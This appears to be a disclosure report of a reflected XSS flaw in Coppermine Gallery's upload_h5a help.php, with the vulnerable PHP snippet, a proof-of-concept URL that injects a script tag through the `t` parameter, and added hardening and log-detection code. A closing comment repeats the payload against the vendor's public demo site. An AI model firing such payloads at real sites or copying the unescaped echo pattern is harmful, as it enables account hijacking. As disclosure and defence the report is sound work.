Cross-site Scripting (XSS) - Reflected in coppermine-gallery/cpg1.6.x
Valid
Reported on May 6th 2021
✍️ Description
Coppermine is vulnerable to reflected XSS on /plugins/upload_h5a/help.php
because it does not sanitize user-supplied parameters, as shown below.
Vulnerable variable: t
Method: GET
The $styles variable is built from user-supplied data and then echoed, unescaped, into the response.
<?php
// $_GET['t'] is placed straight into the stylesheet path
$styles = '../../themes/'.$_GET['t'].'/style.css';
$hpath = 'help/'.$_GET['g'].'/';
$lang = $_GET['l'];
$hfile = file_exists($hpath.$lang.'.html') ? $lang.'.html' : 'english.html';
?>
<!DOCTYPE html>
<html lang="en">
<head>
<title></title>
<!-- sink: $styles is echoed inside an attribute value without escaping -->
<link rel="stylesheet" type="text/css" href="<?php echo $styles; ?>">
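The following is an added example of how the `t` parameter could be handled safely; it is not Coppermine's code or its fix. It assumes the themes directory sits at ../../themes relative to help.php, that theme directory names only ever contain letters, digits, underscores and hyphens, and that a hypothetical theme called `classic` exists as a fallback. The theme name is validated against an allowlist and checked against the directory on disk, and the resulting path is still escaped for the attribute context it is echoed into.

```php
<?php
// Added example (not Coppermine's code): hardened handling of the `t`
// parameter that help.php uses to build the stylesheet path.
// Assumptions: themes live under ../../themes/ relative to this file,
// theme directory names use only [A-Za-z0-9_-], and 'classic' is a
// hypothetical fallback theme name.

const THEMES_DIR = __DIR__ . '/../../themes';
const DEFAULT_THEME = 'classic'; // hypothetical fallback

/**
 * Return a theme name that is safe to use both as a path component and
 * inside HTML. Anything outside the allowlisted character set, and any
 * name that is not an existing theme directory, falls back to the default.
 */
function safe_theme(?string $t, string $themesDir = THEMES_DIR): string
{
    if ($t === null || !preg_match('/^[A-Za-z0-9_-]{1,64}$/', $t)) {
        return DEFAULT_THEME; // quotes, '<', '/' and '..' never get through
    }
    if (!is_dir($themesDir . '/' . $t)) {
        return DEFAULT_THEME; // unknown theme: fall back rather than trust input
    }
    return $t;
}

/**
 * Build the stylesheet href the way help.php does, but from a validated
 * theme name, and escape it for the attribute it is echoed into.
 */
function stylesheet_href(?string $t): string
{
    $styles = '../../themes/' . safe_theme($t) . '/style.css';
    // Defence in depth: even a validated value is escaped for the attribute context.
    return htmlspecialchars($styles, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Demo: the report's payload (decoded) versus a legitimate theme name.
$pocPayload = '1"><script>alert(/XSS/)</script>';
echo '<link rel="stylesheet" type="text/css" href="' . stylesheet_href($pocPayload) . '">', PHP_EOL;
echo '<link rel="stylesheet" type="text/css" href="' . stylesheet_href('classic') . '">', PHP_EOL;
```

The allowlist is what actually closes the reported issue: the payload never reaches the output because it contains characters a theme directory name cannot have. The `htmlspecialchars` call is there so that a future change to the allowlist cannot silently reopen the attribute context. The same validation belongs on every request parameter that ends up in a filesystem path.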
🕵️♂️ Proof of Concept
In a browser, request the help page under the path where Coppermine is installed (here /cpg16x/):
http://localhost/cpg16x/plugins/upload_h5a/help.php?t=1%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E
Observe the XSS.
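From the defender's side, the request above leaves a clear trace in the web server's access log. The script below is an added example, not part of the report, that picks out requests to help.php whose `t` parameter could not be a real theme name. The log entries are constructed for the demo in Apache combined format; the IPs, timestamps and user agent are made up, and the request path is the one from the report.

```php
<?php
// Added example (not part of the report): triage access-log entries for
// requests to help.php whose `t` parameter cannot be a legitimate theme name.

/**
 * Parse the request line out of a combined-format access log entry and
 * return the decoded `t` parameter, or null if the entry is not a request
 * to help.php or carries no `t`.
 */
function extract_theme_param(string $logLine): ?string
{
    if (!preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $logLine, $m)) {
        return null;
    }
    $url = parse_url($m[1]);
    if (!isset($url['path'], $url['query'])
        || !preg_match('~/plugins/upload_h5a/help\.php$~', $url['path'])) {
        return null;
    }
    parse_str($url['query'], $params); // parse_str also percent-decodes the values
    return isset($params['t']) ? (string) $params['t'] : null;
}

/** True when the value could never be a real theme directory name. */
function is_suspicious_theme(string $t): bool
{
    return !preg_match('/^[A-Za-z0-9_-]{1,64}$/', $t);
}

/** Return the log lines whose `t` parameter fails the theme-name check. */
function flag_suspicious(array $logLines): array
{
    $hits = [];
    foreach ($logLines as $line) {
        $t = extract_theme_param($line);
        if ($t !== null && is_suspicious_theme($t)) {
            $hits[] = $line;
        }
    }
    return $hits;
}

// Constructed sample entries (IPs, timestamps and user agents are made up).
$sample = [
    '203.0.113.7 - - [06/May/2021:10:00:01 +0000] "GET /cpg16x/plugins/upload_h5a/help.php?t=classic&g=upload_h5a&l=english HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [06/May/2021:10:00:05 +0000] "GET /cpg16x/plugins/upload_h5a/help.php?t=1%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [06/May/2021:10:00:09 +0000] "GET /cpg16x/index.php HTTP/1.1" 200 5678 "-" "Mozilla/5.0"',
];

foreach (flag_suspicious($sample) as $hit) {
    echo "SUSPICIOUS: $hit", PHP_EOL;
}
```

Only the second sample line is reported. Matching on "what a valid value looks like" rather than on a specific payload string means URL-encoding tricks or a different script body still trip the check, and the same rule can be expressed in a WAF or SIEM query.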
💥 Impact
According to netsparker:
The impact can lead to disclosure of sensitive data, CSRF attacks and other security vulnerabilities. By exploiting a cross-site scripting vulnerability an attacker can impersonate the victim and take over the account. If the victim has administrative rights it might even lead to code execution on the server, depending on the application and the privileges of the account.
References
jhond0e commented 14 days ago
Hello, I just read this report and realized that the vulnerability has not been fixed on your own website. https://coppermine-gallery.net/demo/cpg16x/plugins/upload_h5a/help.php?t=1%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E
Have a good day.